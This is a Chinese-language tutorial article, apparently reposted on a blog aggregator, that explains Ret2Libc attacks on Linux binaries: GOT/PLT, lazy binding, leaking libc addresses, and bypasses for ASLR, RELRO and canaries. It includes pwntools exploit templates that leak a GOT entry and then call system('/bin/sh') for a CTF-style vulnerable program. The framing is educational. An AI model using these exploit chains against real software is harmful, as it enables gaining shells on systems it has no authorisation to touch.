当前位置：首页 > article >正文

别再死记硬背了！图解Ret2Libc核心原理：从GOT/PLT、延迟绑定到libc地址泄露

article 2026/4/24 23:10:42

逆向工程实战Ret2Libc攻击原理与延迟绑定机制深度解析从动态链接到内存泄露理解Ret2Libc的底层逻辑在二进制安全领域Ret2LibcReturn-to-libc是一种绕过NXNo-eXecute保护的经典攻击技术。与传统的栈溢出攻击不同它不依赖直接执行栈上的shellcode而是通过重用程序已加载的libc库中的函数来实现攻击目标。理解这项技术需要掌握三个核心概念动态链接机制、GOT/PLT表结构以及延迟绑定Lazy Binding原理。动态链接是现代操作系统提高内存利用率的关键设计。当程序调用printf、system等库函数时实际执行的代码并不在可执行文件内部而是位于共享库libc.so中。这种按需加载机制带来了两个关键数据结构PLTProcedure Linkage Table程序链接表包含跳转到GOT的短指令序列GOTGlobal Offset Table全局偏移表最初存储指向PLT的指针在函数首次调用后更新为实际函数地址延迟绑定是动态链接的效率优化策略——函数地址只在第一次调用时解析。这个过程大致分为以下步骤程序首次调用库函数如putsCPU跳转到PLT表中对应的条目PLT条目从GOT获取地址此时指向PLT中的解析代码动态链接器解析函数真实地址并更新GOT后续调用直接通过GOT跳转到真实函数正是这个延迟绑定过程使得我们可以通过精心构造的溢出payload在函数地址解析后但未正确返回时泄露出内存中的libc函数地址。GOT/PLT交互图解函数调用的幕后过程理解GOT和PLT的交互流程是掌握Ret2Libc的关键。下面通过一个具体的puts函数调用示例展示32位Linux系统中的完整调用链调用栈示例 --------------------- | 调用者代码 | 执行 call putsplt --------------------- | PLT条目 | jmp *putsGOT (首次跳转至解析例程) --------------------- | 动态链接器 | 解析puts真实地址并更新GOT --------------------- | libc中的puts实现 | 真实函数执行 ---------------------在x86架构中这个过程涉及以下关键内存区域内存区域初始状态首次调用后状态PLT跳转指令(jmp *GOT)保持不变GOT指向PLT中的解析代码指向libc中的真实函数地址64位系统的调用约定有所不同参数传递通过寄存器完成前六个参数依次使用RDI, RSI, RDX, RCX, R8, R9剩余参数通过栈传递返回值存放在RAX寄存器这种差异直接影响了payload的构造方式。例如要调用write(1, address, 4)打印内存内容在64位系统中需要# 64位ROP链示例 payload [ pop_rdi, 1, # 第一个参数 pop_rsi, target_addr, # 第二个参数 pop_rdx, 4, # 第三个参数 write_plt # 调用write ]地址泄露实战从理论到 exploit 编写利用延迟绑定机制泄露libc地址通常遵循以下步骤定位溢出点确定可以覆盖返回地址的缓冲区大小构造第一阶段payload使用已解析的函数如write或puts打印GOT表中的函数地址返回到main或其它合适位置准备第二次溢出计算libc基址根据泄露的地址和已知的libc版本确定偏移量基址泄露地址 - 已知偏移构造第二阶段payload计算system和/bin/sh的实际地址执行最终的ROP链下面是一个32位系统的典型exploit框架from pwn import * context(archi386, oslinux) # 准备阶段 e ELF(./vulnerable) libc ELF(/lib/i386-linux-gnu/libc.so.6) # 根据实际情况调整 # 第一轮泄露write地址 payload flat( bA * offset, e.plt[write], e.symbols[main], # 返回地址 1, # 文件描述符 e.got[write], # 要打印的地址 4 # 长度 ) # 发送payload并接收泄露的地址 io.send(payload) write_addr u32(io.recv(4)) # 计算libc基址和关键函数地址 libc_base write_addr - libc.symbols[write] system_addr libc_base libc.symbols[system] binsh_addr libc_base next(libc.search(b/bin/sh)) # 第二轮获取shell payload flat( bA * offset, system_addr, 0xdeadbeef, # 虚假返回地址 binsh_addr )在实际CTF比赛中有几个常见变种需要考虑无libc版本给定通过泄露多个函数地址或使用在线工具如libc-database识别版本只有一次溢出机会需要精心设计ROP链在一次payload中完成泄露和攻击栈对齐问题特别是在64位系统中可能需要添加额外的ret指令保证栈对齐防御措施与绕过技巧现代环境下的Ret2Libc演变随着安全防护技术的演进传统的Ret2Libc技术面临多种防御机制防御技术原理常见绕过方法ASLR随机化内存布局通过信息泄露获取地址RELRO限制GOT写权限利用已解析的函数Stack Canary检测栈溢出信息泄露或格式化字符串漏洞PIE随机化代码段地址通过PLT/GOT泄露基址在部分RELROPartial RELRO情况下GOT表仍然可写传统Ret2Libc仍然有效。但在完全RELROFull RELRO下攻击者需要寻找其他技术如Return-to-dlresolve利用动态链接器的解析机制House of系列攻击针对堆分配器的攻击FSOPFile Stream Oriented Programming利用文件流相关结构一个实用的技巧是当目标程序没有提供libc时可以通过泄露多个函数地址来提高版本识别的准确性。例如同时泄露puts和printf的地址# 同时泄露两个函数地址的payload示例 payload flat( bA * offset, e.plt[puts], e.symbols[main], e.got[puts], e.plt[puts], e.symbols[main], e.got[printf] )在真实漏洞利用中可靠的信息泄露往往比复杂的ROP链更重要。我曾在一个CTF挑战中花费数小时构造复杂的链最终发现简单的puts泄露就能解决问题——有时候最简单的方案就是最有效的。

别再死记硬背了！图解Ret2Libc核心原理：从GOT/PLT、延迟绑定到libc地址泄露

相关文章：

别再死记硬背了！图解Ret2Libc核心原理：从GOT/PLT、延迟绑定到libc地址泄露

程序员的中年危机自救指南：不只是写代码——软件测试从业者的专业突围路径

ESP8266/ESP32上电启动log全解析：从‘rst cause’到‘flash read err’的故障排查手册

测试开发如何突破35岁瓶颈？三个被验证的转型路径

Steam成就管理器终极指南：5分钟掌握游戏成就修改完整方案

WPF资源字典的模块化拼图：MergedDictionaries的实战应用与设计模式

安道利老师助力临夏腾顺驾校实现AI招生破局

球类运动实测！带赛场数据分析的AI尚运动相机推荐

LumiPixel Canvas Quest 纯净人像创作站：5分钟快速上手，打造你的专属像素艺术

Voxtral-4B-TTS-2603部署教程：24GB GPU显存占用分析与vLLM-Omni优化配置

还在手动逐字整理会议纪要？2026年这5款真香AI工具，3分钟搞定2小时会议录音

如何彻底掌控Windows Defender？5分钟学会系统优化神器defender-control

竟然还在手动逐字整理会议纪要？2026年这5款会议纪要软件10分钟搞定3小时长会

终极指南：如何用Nucleus Co-Op免费实现单电脑多人分屏游戏体验

竟然还在手动整理1小时会议录音和待办？2026年这4款智能会议助手让你准点下班

全屋智能的理性决策：从真实体验拆解哪些功能值得投入

什么是SRM系统，国内的SRM系统有哪些？全面了解SCM系统

别墅露台与阳光房设计：如何界定使用边界，平衡功能与法规？

别墅装新风，全屋还是局部？一个踩过坑的从业者聊聊我的判断

钩子函数详解

AutoHotKey循环实战：用While和Loop实现一个“按住测量”的屏幕标尺工具（附完整脚本）

长芯微LMD2484完全P2P替代LTC2484，高精度delta-sigma模数(A/D)转换器

长芯微LMD1254完全P2P替代ADS1254,是一款高精度、宽动态范围的Δ-Σ型24位模数转换器

角色与内容集合：自动化配置的标准化复用机制

5分钟搞定抖音内容保存：douyin-downloader批量下载实战指南

终极指南：如何用XXMI启动器一键管理6款热门二次元游戏模组

从访达到终端：解锁Mac高效工作流的核心快捷操作与Alfred5进阶技巧

Unity游戏资源提取终极指南：跨平台工具UABEAvalonia深度解析与实战应用

VSCode多智能体调试正在淘汰传统单点断点模式！2024年Gartner技术成熟度报告证实：分布式调试已成为AI原生开发刚需

别再傻傻分不清CWE和CVE了！给开发者的5分钟快速扫盲指南